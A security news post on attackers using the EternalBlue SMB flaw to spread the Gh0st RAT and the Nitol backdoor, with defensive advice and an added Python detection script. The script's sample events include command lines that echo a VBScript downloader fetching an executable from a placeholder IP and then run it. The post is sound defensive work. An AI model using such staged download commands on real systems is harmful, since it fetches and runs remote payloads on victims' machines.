“EternalBlue” vulnerability has been exploited to spread malware Gh0st RAT & Nitol backdoor – Penetration Testing

FireEye security researchers have recently found attackers exploiting the EternalBlue SMB vulnerability (the MS17-010 flaw also used by WannaCry) to deliver the Nitol backdoor together with the Gh0st RAT malware.

Gh0st RAT is a Windows remote-access trojan that has been used primarily against government agencies, political activists and other political targets. The Nitol backdoor has previously been delivered by exploiting an ADODB.Stream ActiveX Object vulnerability that affects older versions of Internet Explorer.

The technique used to spread Nitol and Gh0st RAT closely resembles the one used by the WannaCry ransomware. Once a machine has been successfully exploited, the attacker first obtains a command shell, writes commands into a VBScript file, and then executes that script to download the next-stage payload from another server.

Figure: EternalBlue exploitation chain used to deliver the payloads
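The delivery chain described above (shell spawned after exploitation, commands echoed into a .vbs file, script executed to fetch the payload) leaves a distinctive trace in process-creation telemetry. The following is an added detection example, not code from FireEye or the original post: it correlates, per host, a shell redirecting `echo` output into a `.vbs` file with a later `cscript`/`wscript` execution of that same file. The event field names (`ts`, `host`, `image`, `cmdline`), the sample events, the IP address and the 10-minute correlation window are all constructed assumptions for the example, not data from the report.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample of process-creation events (Sysmon-like fields, simplified).
# These events are invented for the example and are not taken from the FireEye report.
SAMPLE_EVENTS = [
    # Attacker shell stages a downloader script line by line (WS01), then runs it.
    {"ts": "2017-06-02T10:15:01", "host": "WS01", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd.exe /c echo Set o = CreateObject("MSXML2.XMLHTTP") > C:\Windows\Temp\a.vbs'},
    {"ts": "2017-06-02T10:15:02", "host": "WS01", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd.exe /c echo o.Open "GET", "http://203.0.113.5/p.exe", False >> C:\Windows\Temp\a.vbs'},
    {"ts": "2017-06-02T10:15:05", "host": "WS01", "image": r"C:\Windows\System32\cscript.exe",
     "cmdline": r"cscript.exe C:\Windows\Temp\a.vbs"},
    # Benign: an existing logon script is run; nothing on this host echoed it to disk first.
    {"ts": "2017-06-02T10:20:00", "host": "WS02", "image": r"C:\Windows\System32\cscript.exe",
     "cmdline": r"cscript.exe \\fileserver\netlogon\logon.vbs"},
    # Benign: echo redirected into a text file, not a script.
    {"ts": "2017-06-02T10:21:00", "host": "WS02", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c echo done > C:\Temp\status.txt"},
    # Staged .vbs on WS03 that is only executed two hours later (outside the default window).
    {"ts": "2017-06-02T11:00:00", "host": "WS03", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c echo x > C:\Users\Public\b.vbs"},
    {"ts": "2017-06-02T13:00:00", "host": "WS03", "image": r"C:\Windows\System32\cscript.exe",
     "cmdline": r"cscript.exe C:\Users\Public\b.vbs"},
]

# "echo ... > file.vbs" or "echo ... >> file.vbs"; group 1 is the target path.
ECHO_TO_VBS = re.compile(r'echo\b.*?>>?\s*"?([^"\s>]+\.vbs)"?', re.IGNORECASE)
# cscript/wscript launching a .vbs; group 1 is the script path.
RUN_VBS = re.compile(r'\b[cw]script(?:\.exe)?\b.*?"?([^"\s]+\.vbs)"?', re.IGNORECASE)
# URLs embedded in the staged script lines (where the next-stage payload is fetched from).
URL_RE = re.compile(r'https?://[^\s"\']+', re.IGNORECASE)


def detect_staged_vbs(events, window=timedelta(minutes=10)):
    """Return one alert per (host, script) where a shell echoed a .vbs file to disk
    and the same host executed that file within `window` of the first write."""
    staged = defaultdict(dict)   # host -> {script path (lowercased): {"first": ts, "lines": [...]}}
    alerts = []
    for ev in sorted(events, key=lambda e: e["ts"]):
        ts = datetime.fromisoformat(ev["ts"])
        host, cmd = ev["host"], ev["cmdline"]

        m = ECHO_TO_VBS.search(cmd)
        if m:
            key = m.group(1).lower()
            entry = staged[host].setdefault(key, {"first": ts, "lines": []})
            entry["lines"].append(cmd)
            continue

        m = RUN_VBS.search(cmd)
        if m:
            key = m.group(1).lower()
            entry = staged[host].get(key)
            if entry and ts - entry["first"] <= window:
                urls = sorted({u for line in entry["lines"] for u in URL_RE.findall(line)})
                alerts.append({
                    "host": host,
                    "script": key,
                    "staged_at": entry["first"].isoformat(),
                    "executed_at": ts.isoformat(),
                    "staged_lines": len(entry["lines"]),
                    "download_urls": urls,
                })
    return alerts


if __name__ == "__main__":
    for alert in detect_staged_vbs(SAMPLE_EVENTS):
        print(alert)
```

The correlation key is the script path rather than the parent process, because the page only tells us that the shell writes a VBScript and then runs it; the window keeps a long-lived but legitimately generated script from firing the rule, and the extracted URLs give the responder the second-stage server to block or hunt for.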

So far the researchers have detected these malicious samples in Singapore and South Asia. They expect that over the next weeks or months more attackers will pair EternalBlue with different payloads and spread Nitol, Gh0st RAT and other malware to the rest of the world. In addition to routine patch management for systems and networks, administrators are advised to enable intrusion detection and prevention systems, disable obsolete or unnecessary protocols and ports (for EternalBlue that means SMBv1 and exposed TCP 445), proactively monitor network traffic, protect endpoints and deploy layered security mechanisms.

FireEye's detailed report is available here.

The post “EternalBlue” vulnerability has been exploited to spread malware Gh0st RAT & Nitol backdoor appeared first on Penetration Testing. http://ift.tt/2rx1oh3 http://ift.tt/2aM8QhC
